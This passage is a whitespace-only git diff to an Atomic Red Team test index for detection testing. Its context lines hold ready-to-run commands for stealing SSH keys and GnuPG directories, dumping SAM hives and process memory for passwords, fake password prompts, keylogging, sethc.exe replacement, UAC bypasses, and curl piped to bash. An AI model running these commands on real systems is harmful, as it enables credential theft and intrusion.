           find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \;
         cleanup_command: 'rm #{output_folder}
 
-          '
+'
         name: sh
     - name: Copy Private SSH Keys with rsync
       auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a
       description: 'Copy private SSH keys on a Linux or macOS system to a staging
         folder using the `rsync` command.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -5044,14 +5044,14 @@ credential-access:
           find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \;
         cleanup_command: 'rm -rf #{output_folder}
 
-          '
+'
         name: sh
     - name: Copy the users GnuPG directory with rsync
       auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca
       description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system
         to a staging folder using the `rsync` command.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -5070,7 +5070,7 @@ credential-access:
           find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \;
         cleanup_command: 'rm -rf #{output_folder}
 
-          '
+'
         name: sh
   T1003.007:
     technique:
@@ -5138,7 +5138,7 @@ credential-access:
       dependencies:
       - description: 'Script to launch target process must exist
 
-          '
+'
         prereq_command: |
           test -f #{script_path}
           grep "#{pid_term}" #{script_path}
@@ -5159,7 +5159,7 @@ credential-access:
           grep -i "PASS" "#{output_file}"
         cleanup_command: 'rm -f "#{output_file}"
 
-          '
+'
     - name: Dump individual process memory with Python (Local)
       auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
       description: |
@@ -5187,7 +5187,7 @@ credential-access:
       dependencies:
       - description: 'Script to launch target process must exist
 
-          '
+'
         prereq_command: |
           test -f #{script_path}
           grep "#{pid_term}" #{script_path}
@@ -5196,11 +5196,11 @@ credential-access:
           echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
       - description: 'Requires Python
 
-          '
+'
         prereq_command: "(which python || which python3 || which python2)\n"
         get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed"
 
-          '
+'
       executor:
         name: sh
         elevation_required: true
@@ -5212,7 +5212,7 @@ credential-access:
           grep -i "PASS" "#{output_file}"
         cleanup_command: 'rm -f "#{output_file}"
 
-          '
+'
   T1606.002:
     technique:
       external_references:
@@ -5359,42 +5359,42 @@ credential-access:
       auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
       description: 'Parses registry hives to obtain stored credentials
 
-        '
+'
       supported_platforms:
       - windows
       dependency_executor_name: command_prompt
       dependencies:
       - description: 'Computer must have python 3 installed
 
-          '
+'
         prereq_command: |
           py -3 --version >nul 2>&1
           exit /b %errorlevel%
         get_prereq_command: 'echo "Python 3 must be installed manually"
 
-          '
+'
       - description: 'Computer must have pip installed
 
-          '
+'
         prereq_command: |
           py -3 -m pip --version >nul 2>&1
           exit /b %errorlevel%
         get_prereq_command: 'echo "PIP must be installed manually"
 
-          '
+'
       - description: 'pypykatz must be installed and part of PATH
 
-          '
+'
         prereq_command: |
           pypykatz -h >nul 2>&1
           exit /b %errorlevel%
         get_prereq_command: 'pip install pypykatz
 
-          '
+'
       executor:
         command: 'pypykatz live registry
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: esentutl.exe SAM copy
@@ -5420,12 +5420,12 @@ credential-access:
       executor:
         command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
 
-          '
+'
         name: command_prompt
         elevation_required: true
         cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1
 
-          '
+'
     - name: PowerDump Registry dump of SAM for hashes and usernames
       auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
       description: Executes a hashdump by reading the hasshes from the registry.
@@ -5478,7 +5478,7 @@ credential-access:
       auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
       description: 'Dump hives from volume shadow copies with System.IO.File
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -6293,7 +6293,7 @@ collection:
         elevation_required: false
         command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
 
-          '
+'
         cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore'
   T1560.003:
     technique:
@@ -6389,7 +6389,7 @@ collection:
       auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8
       description: 'Uses GZip from Python to compress files
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -6405,10 +6405,10 @@ collection:
       dependencies:
       - description: 'Requires Python
 
-          '
+'
         prereq_command: 'which_python=`which python`; $which_python -V
 
-          '
+'
         get_prereq_command: ''
       executor:
         name: bash
@@ -6416,15 +6416,15 @@ collection:
         command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'',
           ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();"
 
-          '
+'
         cleanup_command: 'rm #{path_to_output_file}
 
-          '
+'
     - name: Compressing data using bz2 in Python (Linux)
       auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d
       description: 'Uses bz2 from Python to compress files
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -6440,25 +6440,25 @@ collection:
       dependencies:
       - description: 'Requires Python
 
-          '
+'
         prereq_command: 'which_python=`which python`; $which_python -V
 
-          '
+'
         get_prereq_command: ''
       executor:
         name: bash
         elevation_required: false
         command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();"
 
-          '
+'
         cleanup_command: 'rm #{path_to_output_file}
 
-          '
+'
     - name: Compressing data using zipfile in Python (Linux)
       auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0
       description: 'Uses zipfile from Python to compress files
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -6474,10 +6474,10 @@ collection:
       dependencies:
       - description: 'Requires Python
 
-          '
+'
         prereq_command: 'which_python=`which python`; $which_python -V
 
-          '
+'
         get_prereq_command: ''
       executor:
         name: bash
@@ -6485,15 +6485,15 @@ collection:
         command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'',
           mode=''w'').write(''#{path_to_input_file}'')"
 
-          '
+'
         cleanup_command: 'rm #{path_to_output_file}
 
-          '
+'
     - name: Compressing data using tarfile in Python (Linux)
       auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db
       description: 'Uses tarfile from Python to compress files
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -6509,10 +6509,10 @@ collection:
       dependencies:
       - description: 'Requires Python
 
-          '
+'
         prereq_command: 'which_python=`which python`; $which_python -V
 
-          '
+'
         get_prereq_command: ''
       executor:
         name: bash
@@ -6521,7 +6521,7 @@ collection:
           mode='w').write('#{path_to_input_file}')\" \n"
         cleanup_command: 'rm #{path_to_output_file}
 
-          '
+'
   T1560.001:
     technique:
       created: '2020-02-20T21:01:25.428Z'
@@ -6604,10 +6604,10 @@ collection:
       dependencies:
       - description: 'Rar tool must be installed at specified location (#{rar_exe})
 
-          '
+'
         prereq_command: 'if not exist "#{rar_exe}" (exit /b 1)
 
-          '
+'
         get_prereq_command: |
           echo Downloading Winrar installer
           bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
@@ -6617,10 +6617,10 @@ collection:
         elevation_required: false
         command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension}
 
-          '
+'
         cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
 
-          '
+'
     - name: Compress Data and lock with password for Exfiltration with winrar
       auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c
       description: |
@@ -6640,10 +6640,10 @@ collection:
       dependencies:
       - description: 'Rar tool must be installed at specified location (#{rar_exe})
 
-          '
+'
         prereq_command: 'if not exist "#{rar_exe}" (exit /b 1)
 
-          '
+'
         get_prereq_command: |
           echo Downloading Winrar installer
           bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
@@ -6681,11 +6681,11 @@ collection:
       dependencies:
       - description: 'Winzip must be installed
 
-          '
+'
         prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo
           0)''
 
-          '
+'
         get_prereq_command: |
           if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
             Write-Host Follow the installation prompts to continue
@@ -6705,7 +6705,7 @@ collection:
       auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
       description: 'Note: Requires 7zip installation
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -6720,10 +6720,10 @@ collection:
       dependencies:
       - description: '7zip tool must be installed at specified location (#{7zip_exe})
 
-          '
+'
         prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1)
 
-          '
+'
         get_prereq_command: |
           echo Downloading 7-zip installer
           bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer}
@@ -6742,7 +6742,7 @@ collection:
       description: 'An adversary may compress data (e.g., sensitive documents) that
         is collected prior to exfiltration. This test uses standard zip compression.
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -6759,30 +6759,30 @@ collection:
       dependencies:
       - description: 'Files to zip must exist (#{input_files})
 
-          '
+'
         prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else
           exit 1; fi;
 
-          '
+'
         get_prereq_command: 'echo Please set input_files argument to include files
           that exist
 
-          '
+'
       executor:
         name: sh
         elevation_required: false
         command: 'zip #{output_file} #{input_files}
 
-          '
+'
         cleanup_command: 'rm -f #{output_file}
 
-          '
+'
     - name: Data Compressed - nix - gzip Single File
       auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
       description: 'An adversary may compress data (e.g., sensitive documents) that
         is collected prior to exfiltration. This test uses standard gzip compression.
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -6802,16 +6802,16 @@ collection:
         command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}''
           >> #{input_file}; gzip -k #{input_file})
 
-          '
+'
         cleanup_command: 'rm -f #{input_file}.gz
 
-          '
+'
     - name: Data Compressed - nix - tar Folder or File
       auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a
       description: 'An adversary may compress data (e.g., sensitive documents) that
         is collected prior to exfiltration. This test uses standard gzip compression.
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -6827,28 +6827,28 @@ collection:
       dependencies:
       - description: 'Folder to zip must exist (#{input_file_folder})
 
-          '
+'
         prereq_command: 'test -e #{input_file_folder}
 
-          '
+'
         get_prereq_command: 'echo Please set input_file_folder argument to a folder
           that exists
 
-          '
+'
       executor:
         name: sh
         elevation_required: false
         command: 'tar -cvzf #{output_file} #{input_file_folder}
 
-          '
+'
         cleanup_command: 'rm -f #{output_file}
 
-          '
+'
     - name: Data Encrypted with zip and gpg symmetric
       auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f'
       description: 'Encrypt data for exiltration
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -6871,10 +6871,10 @@ collection:
         prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)"
           ]; then exit 1; fi;
 
-          '
+'
         get_prereq_command: 'echo "Install gpg and zip to run the test"; exit 1;
 
-          '
+'
       executor:
         name: sh
         elevation_required: false
@@ -6886,7 +6886,7 @@ collection:
           ls -l #{test_folder}
         cleanup_command: 'rm -Rf #{test_folder}
 
-          '
+'
   T1123:
     technique:
       id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967
@@ -6936,7 +6936,7 @@ collection:
       executor:
         command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
 
-          '
+'
         name: powershell
   T1119:
     technique:
@@ -7006,7 +7006,7 @@ collection:
           for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
         cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
 
-          '
+'
         name: command_prompt
     - name: Automated Collection PowerShell
       auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
@@ -7022,7 +7022,7 @@ collection:
         cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force
           -ErrorAction Ignore | Out-Null
 
-          '
+'
         name: powershell
     - name: Recon information for export with PowerShell
       auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26
@@ -7111,7 +7111,7 @@ collection:
       auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
       description: 'Add data to clipboard to copy off or execute commands from.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -7121,14 +7121,14 @@ collection:
           clip < %temp%\T1115.txt
         cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Execute Commands from Clipboard using PowerShell
       auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
       description: 'Utilize PowerShell to echo a command to clipboard and execute
         it
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -7151,7 +7151,7 @@ collection:
       description: 'This module copies the data stored in the user''s clipboard and
         writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -7163,7 +7163,7 @@ collection:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -7174,7 +7174,7 @@ collection:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -7184,7 +7184,7 @@ collection:
         cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt"
           -ErrorAction Ignore
 
-          '
+'
         name: powershell
   T1213.001:
     technique:
@@ -7334,7 +7334,7 @@ collection:
       auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
       description: 'Hooks functions in PowerShell to read TLS Communications
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -7350,10 +7350,10 @@ collection:
       dependencies:
       - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name})
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}"
@@ -7906,7 +7906,7 @@ collection:
           to apply changes." & return & return  default answer "" with icon 1 with
           hidden answer with title "Software Update"''
 
-          '
+'
         name: bash
     - name: PowerShell - Prompt User for Password
       auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
@@ -8077,7 +8077,7 @@ collection:
           .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
         cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Living off the land Terminal Input Capture on Linux with pam.d
@@ -8096,14 +8096,14 @@ collection:
       dependencies:
       - description: 'Checking if pam_tty_audit.so is installed
 
-          '
+'
         prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so''
 
-          '
+'
         get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
           and recompile, for this test to work"
 
-          '
+'
       supported_platforms:
       - linux
       executor:
@@ -8276,17 +8276,17 @@ collection:
         command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat"
           -OutFile #{output_file}
 
-          '
+'
         cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Stage data from Discovery.sh
       auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
       description: 'Utilize curl to download discovery.sh and execute a basic information
         gathering shell script
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -8299,7 +8299,7 @@ collection:
         command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
           | bash -s > #{output_file}
 
-          '
+'
         name: bash
     - name: Zip a Folder with PowerShell for Staging in Temp
       auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
@@ -8321,10 +8321,10 @@ collection:
         command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
           -Force
 
-          '
+'
         cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
 
-          '
+'
         name: powershell
   T1114.001:
     technique:
@@ -8395,23 +8395,23 @@ collection:
       dependencies:
       - description: 'Get-Inbox.ps1 must be located at #{file_path}
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1"
           -OutFile "#{file_path}\Get-Inbox.ps1"
 
-          '
+'
       executor:
         command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1
           -file #{output_file}
 
-          '
+'
         cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
   T1185:
     technique:
@@ -8751,7 +8751,7 @@ collection:
         or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated
         Mac Malware)
 
-        '
+'
       name: Screen Capture
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688
@@ -8783,7 +8783,7 @@ collection:
       auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
       description: 'Use screencapture command to collect a full desktop screenshot
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -8794,16 +8794,16 @@ collection:
       executor:
         command: 'screencapture #{output_file}
 
-          '
+'
         cleanup_command: 'rm #{output_file}
 
-          '
+'
         name: bash
     - name: Screencapture (silent)
       auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
       description: 'Use screencapture command to collect a full desktop screenshot
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -8814,17 +8814,17 @@ collection:
       executor:
         command: 'screencapture -x #{output_file}
 
-          '
+'
         cleanup_command: 'rm #{output_file}
 
-          '
+'
         name: bash
     - name: X Windows Capture
       auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
       description: 'Use xwd command to collect a full desktop screenshot and review
         file with xwud
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -8846,11 +8846,11 @@ collection:
       dependencies:
       - description: 'Package with XWD and XWUD must exist on device
 
-          '
+'
         prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
           1; fi
 
-          '
+'
         get_prereq_command: "sudo #{package_installer} \n"
       executor:
         command: |
@@ -8858,14 +8858,14 @@ collection:
           xwud -in #{output_file}
         cleanup_command: 'rm #{output_file}
 
-          '
+'
         name: bash
     - name: Capture Linux Desktop using Import Tool
       auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
       description: 'Use import command from ImageMagick to collect a full desktop
         screenshot
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -8876,28 +8876,28 @@ collection:
       dependencies:
       - description: 'ImageMagick must be installed
 
-          '
+'
         prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit
           1; fi
 
-          '
+'
         get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat
 
-          '
+'
       executor:
         command: 'import -window root #{output_file}
 
-          '
+'
         cleanup_command: 'rm #{output_file}
 
-          '
+'
         name: bash
     - name: Windows Screencapture
       auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
       description: 'Use Psr.exe binary to collect screenshots of user display. Test
         will do left mouse click to simulate user behaviour
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -8919,7 +8919,7 @@ collection:
           cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
         cleanup_command: 'rm #{output_file} -ErrorAction Ignore
 
-          '
+'
   T1213.002:
     technique:
       external_references:
@@ -9308,7 +9308,7 @@ privilege-escalation:
           description: 'Comma separated list of system binaries to which you want
             to attach each #{attached_process}. Default: "osk.exe"
 
-            '
+'
           type: String
           default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
             atbroker.exe
@@ -9316,7 +9316,7 @@ privilege-escalation:
           description: 'Full path to process to attach to target in #{parent_list}.
             Default: cmd.exe
 
-            '
+'
           type: Path
           default: C:\windows\system32\cmd.exe
       executor:
@@ -9350,7 +9350,7 @@ privilege-escalation:
       auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
       description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -9361,7 +9361,7 @@ privilege-escalation:
           copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
         cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1547.014:
@@ -9620,11 +9620,11 @@ privilege-escalation:
       - description: 'Reg files must exist on disk at specified locations (#{registry_file}
           and #{registry_cleanup_file})
 
-          '
+'
         prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file}))
           {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null
@@ -9633,11 +9633,11 @@ privilege-escalation:
       - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and
           T1546.010x86.dll)
 
-          '
+'
         prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll))
           {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll
@@ -9645,10 +9645,10 @@ privilege-escalation:
       executor:
         command: 'reg.exe import #{registry_file}
 
-          '
+'
         cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1546.011:
@@ -9756,31 +9756,31 @@ privilege-escalation:
       - description: 'Shim database file must exist on disk at specified location
           (#{file_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}"
       - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
 
-          '
+'
         prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll
       executor:
         command: 'sdbinst.exe #{file_path}
 
-          '
+'
         cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: New shim database files created in the default shim database directory
@@ -9978,7 +9978,7 @@ privilege-escalation:
       description: 'This test submits a command to be run in the future by the `at`
         daemon.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -9994,30 +9994,30 @@ privilege-escalation:
       dependencies:
       - description: 'The `at` and `atd` executables must exist in the PATH
 
-          '
+'
         prereq_command: 'which at && which atd
 
-          '
+'
         get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
           in the PATH (Package name: `at`)''
 
-          '
+'
       - description: 'The `atd` daemon must be running
 
-          '
+'
         prereq_command: 'systemctl status atd || service atd status
 
-          '
+'
         get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
           atd start` ; systemd: `systemctl start atd`)''
 
-          '
+'
       executor:
         name: sh
         elevation_required: false
         command: 'echo "#{at_command}" | at #{time_spec}
 
-          '
+'
   T1053.002:
     technique:
       external_references:
@@ -10114,7 +10114,7 @@ privilege-escalation:
         elevation_required: false
         command: 'at 13:20 /interactive cmd
 
-          '
+'
   T1547.002:
     technique:
       id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec
@@ -10424,7 +10424,7 @@ privilege-escalation:
           cmd.exe /c eventvwr.msc
         cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Bypass UAC using Event Viewer (PowerShell)
       auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
@@ -10446,7 +10446,7 @@ privilege-escalation:
         cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
           -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Bypass UAC using Fodhelper
       auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182
@@ -10468,7 +10468,7 @@ privilege-escalation:
         cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
           2>&1
 
-          '
+'
         name: command_prompt
     - name: Bypass UAC using Fodhelper - PowerShell
       auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa
@@ -10491,7 +10491,7 @@ privilege-escalation:
         cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
           -Recurse -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Bypass UAC using ComputerDefaults (PowerShell)
       auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f
@@ -10514,7 +10514,7 @@ privilege-escalation:
         cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
           -Recurse -ErrorAction Ignore
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Bypass UAC by Mocking Trusted Directories
@@ -10562,7 +10562,7 @@ privilege-escalation:
         cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
           -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Disable UAC using reg.exe
       auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
@@ -10575,11 +10575,11 @@ privilege-escalation:
         command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
           /v EnableLUA /t REG_DWORD /d 0 /f
 
-          '
+'
         cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
           /v EnableLUA /t REG_DWORD /d 1 /f
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Bypass UAC using SilentCleanup task
@@ -10716,7 +10716,7 @@ privilege-escalation:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -10761,7 +10761,7 @@ privilege-escalation:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -10799,7 +10799,7 @@ privilege-escalation:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -10916,10 +10916,10 @@ privilege-escalation:
       executor:
         command: 'assoc #{extension_to_change}=#{target_extension_handler}
 
-          '
+'
         cleanup_command: 'assoc  #{extension_to_change}=#{original_extension_handler}
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1078.004:
@@ -11120,7 +11120,7 @@ privilege-escalation:
         CronJob for scheduling execution of malicious code that would run as a container
         in the cluster.
 
-        '
+'
       supported_platforms:
       - containers
       input_arguments:
@@ -11131,17 +11131,17 @@ privilege-escalation:
       dependencies:
       - description: 'kubectl must be installed
